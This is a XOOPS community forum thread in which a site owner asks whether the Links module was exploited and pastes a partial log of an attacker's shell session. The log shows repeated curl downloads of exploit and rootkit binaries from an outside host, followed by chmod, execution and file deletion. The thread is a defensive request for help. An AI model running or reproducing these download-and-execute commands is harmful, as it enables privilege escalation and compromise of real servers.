XOOPS 
Forum
Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk
  1. Board index / 
  2. XOOPS Community Support forums / 
  3. Q and A 
  4.  / Vulnerability in links?
Register
1
Ace_Armstrong
Vulnerability in links?

I've had a couple of XOOPS sites get hacked in recent days, and I recently noticed that both of them had received a very high level of activity in the Links module (the stock module that comes as part of XOOPS) in the days and hours before the hacks.

Is there a known vulnerability in the Links module? If so, any way to tighten it up?

Thanks!
2
jdseymour
Re: Vulnerability in links?

Not to my knowledge, can you give a little more detail as to the type of attack that took place? and what the results where?
3
Ace_Armstrong
Re: Vulnerability in links?

Quote:

jdseymour wrote:
Not to my knowledge, can you give a little more detail as to the type of attack that took place? and what the results where?


I'm not 100% sure what types of attacks they were. In both cases, the hacker was able to gain access to the site sufficiently to wipe out the existing files and attempt to install a rootkit.

Here's a partial transcript of what they tried to do:

Quote:

uname -a
ls
wget
ls
curl -o elf xuxett.cjb.net/app/elf
ls
chmod +x elf
./elf
./elf -f
ls
curl -o kmod xuxett.cjb.net/app/kmod
chmod +x kmod
./kmod
rm -fr kmod
rm -fr elf
curl -o brk2 xuxett.cjb.net/app/brk2
chmod +x brk2
./brk2
rm -fr brk2
curl -o brk xuxett.cjb.net/app/brk
chmod +x brk
./brk
rm -fr brk
curl -o ptrace http://207.44.214.72/app/ptrace
chmod +x ptrace
./ptrace
curl -o uselib24 xuxett.cjb.net/app/uselib24
chmod +x uselib24
./uselib24
curl -o pwned xuxett.cjb.net/app/pwned
chmod +x pwned
./pwned
./pwned
./pwned
./elf -f
ls
rm -fr TTdummyfile
rm -fr TTeatfile
rm -fr TTsharefile
ls
rm -fr TTeatfiles
curl -o elf xuxett.cjb.net/app/elf
chmod +x elf
./elf
./elf -f
./elf
ls
curl -o ptrace24 xuxett.cjb.net/app/ptrace24
chmod +x ptrace24
./ptrace24
exec ./ptrace24 22899
4
jdseymour
Re: Vulnerability in links?

Not sure what their intensions were but I would suggest using the protector module. You can find it Here.
As nothing is completely bullet proof against a determined hacker, this module will make it much tougher to accomplish their goals.

HTH.

PS. Be sure to read and understand the readme.txt when installing.
5
Ace_Armstrong
Re: Vulnerability in links?

Excellent. Thanks!

Login

Register now!  |  Lost Password?

Search

Advanced Search

Recent Posts

Who's Online

331 user(s) are online (267 user(s) are browsing Support Forums)

Members: 0

Guests: 331

more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits